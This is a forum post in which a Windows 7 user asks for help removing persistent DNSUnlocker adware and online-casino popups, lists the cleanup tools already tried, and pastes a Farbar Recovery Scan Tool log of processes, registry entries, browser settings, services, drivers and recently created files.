
Impossible adware "DNSUnlocker", online casino popups/ads.


This topic is locked
6 replies to this topic

#1 swaykeb00b

  • Members
  • 10 posts

Posted 25 December 2015 - 06:10 PM

I'm having trouble with adware. I've tried just about anything to remove it as well, including these steps:

 - Running AdwCleaner, Adware Removal Tool (Techsupportall Team), ComboFix, Junkware Removal Tool, rkill, TDSSKiller, Malwarebytes

 - Switching browsers from Chrome to Firefox (helped a bit, but I still get lots of popups/ads where they shouldn't be)

When running AdwCleaner I had no success at first; I then turned off my internet whilst scanning with it, and it came up with lots of results. Every time I delete these results, they pop up again right after.

Same scenario with the Techsupportall team's version. I then ran JRT with some results, same thing: I scanned and deleted, but the same things still pop up. I then ran rkill, TDSSKiller, ComboFix and Malwarebytes out of panic; Malwarebytes came up with 42 different threats (PUPs), which I quarantined and deleted afterwards. I probably wasn't supposed to run ComboFix, as I came to this forum and saw the warning at the top of the forum; I hope this doesn't interrupt anything.

Here are the logs I was requested to present in the guide to posting:

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:25-12-2015
Ran by Simon (administrator) on SIMON-PC (25-12-2015 23:58:20)
Running from C:\Users\Simon\Downloads
Loaded Profiles: Simon (Available Profiles: Simon)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: Norsk, bokmål (Norge)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDService.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Spotify Ltd) C:\Users\Simon\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Nota Inc.) C:\Program Files (x86)\Gyazo\GyStation.exe
(Spotify Ltd) C:\Users\Simon\AppData\Roaming\Spotify\Spotify.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Spotify Ltd) C:\Users\Simon\AppData\Roaming\Spotify\Spotify.exe
(Spotify Ltd) C:\Users\Simon\AppData\Roaming\Spotify\Spotify.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\macromed\flash\FlashPlayerPlugin_20_0_0_235.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\macromed\flash\FlashPlayerPlugin_20_0_0_235.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-30] (Intel Corporation)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [2891568 2013-10-22] (ELAN Microelectronics Corp.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13667032 2014-01-20] (Realtek Semiconductor)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2585928 2015-01-16] (NVIDIA Corporation)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2013-12-20] (Intel Corporation)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2694040 2014-07-22] (Adobe Systems Incorporated)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\...\Run: [Spotify Web Helper] => C:\Users\Simon\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2346096 2015-12-25] (Spotify Ltd)
HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [7451928 2015-03-13] (Piriform Ltd)
HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\...\Run: [Gyazo] => C:\Program Files (x86)\Gyazo\GyStation.exe [3098424 2015-08-19] (Nota Inc.)
HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\...\Run: [Spotify] => C:\Users\Simon\AppData\Roaming\Spotify\Spotify.exe [8387696 2015-12-25] (Spotify Ltd)
AppInit_DLLs: C:\Windows\System32\nvinitx.dll => C:\Windows\System32\nvinitx.dll [177624 2015-01-10] (NVIDIA Corporation)
AppInit_DLLs: ,C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [177624 2015-01-10] (NVIDIA Corporation)
AppInit_DLLs-x32: c:\Windows\SysWOW64\nvinit.dll => c:\Windows\SysWOW64\nvinit.dll [164568 2015-01-10] (NVIDIA Corporation)
AppInit_DLLs-x32:  C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [164568 2015-01-10] (NVIDIA Corporation)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-07-16] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-07-16] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-07-16] ()
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  No File
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: Hosts file not detected in the default directory
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{4B93233A-B173-4539-92C3-0DD5545714B4}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkId=56626&homepage=hxxp://go.microsoft.com/fwlink/p/?LinkId=255141
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\Simon\AppData\Roaming\Mozilla\Firefox\Profiles\0n9rh6yz.default-1451081654131
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_235.dll [2015-12-25] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [No File]
FF Plugin: adobe.com/AdobeAAMDetect_x86_64 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2014-07-22] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_235.dll [2015-12-25] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-07-25] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2014-07-25] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-25] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-25] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-23] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-05-01] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2014-07-22] (Adobe Systems)

Chrome: 
=======
CHR dev: Chrome dev build detected! <======= ATTENTION
CHR DefaultSearchURL: Default -> hxxps://duckduckgo.com/?q={searchTerms}
CHR DefaultSearchKeyword: Default -> duckduckgo.com
CHR DefaultSuggestURL: Default -> hxxps://ac.duckduckgo.com/ac/?q={searchTerms}&type=list
CHR Profile: C:\Users\Simon\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (gEotit4cheapier) - C:\Users\Simon\AppData\Local\Google\Chrome\User Data\Default\Extensions\aplmodepkfbkgbcilffogjhmecfclgmn [2015-01-28]
CHR Extension: (YouTube) - C:\Users\Simon\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-10-11]
CHR Extension: (Google Search) - C:\Users\Simon\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-01]
CHR Extension: (Gmail) - C:\Users\Simon\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-13]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2015-10-12]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2015-10-12] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2015-10-12] (Microsoft Corporation)
R2 ETDService; C:\Program Files\Elantech\ETDService.exe [101680 2013-10-15] (ELAN Microelectronics Corp.)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1148744 2015-01-16] (NVIDIA Corporation)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-30] (Intel Corporation)
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-09-16] (Intel Corporation)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [284912 2013-10-11] ()
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1706312 2015-01-16] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [21833544 2015-01-16] (NVIDIA Corporation)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [290520 2014-01-08] (Realtek Semiconductor)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3671792 2013-10-11] (Intel® Corporation)

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 busenum; C:\Windows\System32\DRIVERS\SteelBus64.sys [145408 2014-01-08] (SteelSeries Corporation) [File not signed]
S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
R0 iaStorF; C:\Windows\System32\DRIVERS\iaStorF.sys [28008 2013-08-30] (Intel Corporation)
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [192216 2015-12-25] (Malwarebytes)
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
R3 NETwNs64; C:\Windows\System32\DRIVERS\NETwsw02.sys [3599840 2013-10-14] (Intel Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [19784 2015-01-16] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [38032 2014-11-22] (NVIDIA Corporation)
R3 RTSPER; C:\Windows\System32\DRIVERS\RtsPer.sys [466648 2014-02-21] (Realsil Semiconductor Corporation)
S3 SAlphamHid; C:\Windows\System32\DRIVERS\SAlpham64.sys [38016 2013-05-31] (SteelSeries Corporation) [File not signed]
S3 SAlphaPS2; C:\Windows\System32\DRIVERS\SAlphaPS264.sys [26496 2013-12-12] (SteelSeries Corporation) [File not signed]
S3 ssdevfactory; C:\Windows\System32\DRIVERS\ssdevfactory.sys [25088 2015-04-14] (SteelSeries ApS)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-12-25 23:58 - 2015-12-25 23:58 - 00016413 _____ C:\Users\Simon\Downloads\FRST.txt
2015-12-25 23:58 - 2015-12-25 23:58 - 00000000 ____D C:\FRST
2015-12-25 23:57 - 2015-12-25 23:57 - 02370560 _____ (Farbar) C:\Users\Simon\Downloads\FRST64.exe
2015-12-25 23:34 - 2015-12-25 23:35 - 00000059 _____ C:\Users\Simon\Desktop\da.txt
2015-12-25 23:21 - 2015-12-25 23:21 - 00796864 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-12-25 23:21 - 2015-12-25 23:21 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-12-25 23:14 - 2015-12-25 23:14 - 00000000 ____D C:\Users\Simon\Desktop\Gamle Firefox-data
2015-12-25 23:13 - 2015-12-25 23:13 - 00001163 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2015-12-25 23:13 - 2015-12-25 23:13 - 00001151 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2015-12-25 23:13 - 2015-12-25 23:13 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-12-25 23:13 - 2015-12-25 23:13 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2015-12-25 23:12 - 2015-12-25 23:12 - 00248616 _____ C:\Users\Simon\Downloads\Firefox Setup Stub 43.0.2.exe
2015-12-25 22:17 - 2015-12-25 22:17 - 00001459 _____ C:\Users\Simon\Desktop\JRT.txt
2015-12-25 22:06 - 2015-12-25 22:08 - 00000000 ____D C:\Program Files\Adware-Removal-Tool
2015-12-25 22:06 - 2015-12-25 22:06 - 00290304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\subinacl.exe
2015-12-25 22:03 - 2015-12-25 22:03 - 00000000 ___SD C:\ComboFix
2015-12-25 21:52 - 2011-06-26 07:45 - 00256000 _____ C:\Windows\PEV.exe
2015-12-25 21:52 - 2010-11-07 18:20 - 00208896 _____ C:\Windows\MBR.exe
2015-12-25 21:52 - 2009-04-20 05:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2015-12-25 21:52 - 2000-08-31 01:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2015-12-25 21:52 - 2000-08-31 01:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2015-12-25 21:52 - 2000-08-31 01:00 - 00098816 _____ C:\Windows\sed.exe
2015-12-25 21:52 - 2000-08-31 01:00 - 00080412 _____ C:\Windows\grep.exe
2015-12-25 21:52 - 2000-08-31 01:00 - 00068096 _____ C:\Windows\zip.exe
2015-12-25 21:51 - 2015-12-25 22:03 - 00000000 ____D C:\Qoobox
2015-12-25 21:51 - 2015-12-25 22:01 - 00000000 ____D C:\Windows\erdnt
2015-12-25 21:37 - 2015-12-25 21:38 - 00209654 _____ C:\TDSSKiller.3.1.0.9_25.12.2015_21.37.24_log.txt
2015-12-25 21:22 - 2015-12-25 23:04 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-12-25 21:21 - 2015-12-25 21:58 - 00000000 ____D C:\Users\Simon\Desktop\Malware - Bleeping Computer
2015-12-25 21:21 - 2015-12-25 21:21 - 00001106 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-12-25 21:21 - 2015-12-25 21:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-12-25 21:21 - 2015-12-25 21:21 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-12-25 21:21 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-12-25 21:21 - 2015-10-05 09:50 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2015-12-25 21:21 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2015-12-25 21:12 - 2015-12-25 23:31 - 00000000 ____D C:\AdwCleaner
2015-12-25 21:02 - 2015-12-25 22:16 - 00000000 ____D C:\Users\Simon\Desktop\TXT
2015-12-25 21:01 - 2015-12-25 21:02 - 00000000 ____D C:\Users\Simon\Desktop\ungdomsskole
2015-12-25 21:00 - 2015-12-25 21:03 - 00000000 ____D C:\Users\Simon\Desktop\Bilder
2015-12-23 02:41 - 2015-12-23 02:41 - 09498816 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerInstaller.exe
2015-12-23 02:20 - 2015-11-20 19:54 - 03170304 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 02609152 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 00709632 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 00192512 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 00140288 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2015-12-23 02:20 - 2015-11-20 19:54 - 00098816 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 00091136 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2015-12-23 02:20 - 2015-11-20 19:54 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 00012288 _____ (Microsoft Corporation) C:\Windows\system32\wu.upgrade.ps.dll
2015-12-23 02:20 - 2015-11-20 19:34 - 00573440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2015-12-23 02:20 - 2015-11-20 19:34 - 00174080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll
2015-12-23 02:20 - 2015-11-20 19:34 - 00093696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2015-12-23 02:20 - 2015-11-20 19:34 - 00030208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
2015-12-23 02:20 - 2015-11-20 19:33 - 00035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
2015-12-23 02:20 - 2015-11-11 22:12 - 00387792 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2015-12-23 02:20 - 2015-11-11 21:52 - 00341192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2015-12-23 02:20 - 2015-11-11 19:53 - 01735680 _____ (Microsoft Corporation) C:\Windows\system32\comsvcs.dll
2015-12-23 02:20 - 2015-11-11 19:53 - 00525312 _____ (Microsoft Corporation) C:\Windows\system32\catsrvut.dll
2015-12-23 02:20 - 2015-11-11 19:39 - 01242624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comsvcs.dll
2015-12-23 02:20 - 2015-11-11 19:39 - 00487936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\catsrvut.dll
2015-12-23 02:20 - 2015-11-11 17:00 - 12856832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2015-12-23 02:20 - 2015-11-11 16:44 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2015-12-23 02:20 - 2015-11-11 16:44 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2015-12-23 02:20 - 2015-11-11 16:41 - 20366848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2015-12-23 02:20 - 2015-11-11 15:57 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2015-12-23 02:20 - 2015-11-10 19:55 - 01648128 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2015-12-23 02:20 - 2015-11-10 19:55 - 01180160 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2015-12-23 02:20 - 2015-11-10 19:55 - 01008640 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll
2015-12-23 02:20 - 2015-11-10 19:39 - 01251328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2015-12-23 02:20 - 2015-11-10 19:37 - 00833024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll
2015-12-23 02:20 - 2015-11-10 18:47 - 03211264 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2015-12-23 02:20 - 2015-11-10 01:13 - 00496640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2015-12-23 02:20 - 2015-11-10 01:13 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2015-12-23 02:20 - 2015-11-10 01:12 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2015-12-23 02:20 - 2015-11-10 01:11 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2015-12-23 02:20 - 2015-11-10 01:08 - 02280448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2015-12-23 02:20 - 2015-11-10 01:06 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2015-12-23 02:20 - 2015-11-10 01:06 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2015-12-23 02:20 - 2015-11-10 01:04 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2015-12-23 02:20 - 2015-11-10 01:02 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2015-12-23 02:20 - 2015-11-10 01:02 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2015-12-23 02:20 - 2015-11-10 00:50 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2015-12-23 02:20 - 2015-11-10 00:44 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2015-12-23 02:20 - 2015-11-10 00:36 - 02050560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2015-12-23 02:20 - 2015-11-10 00:36 - 00687104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
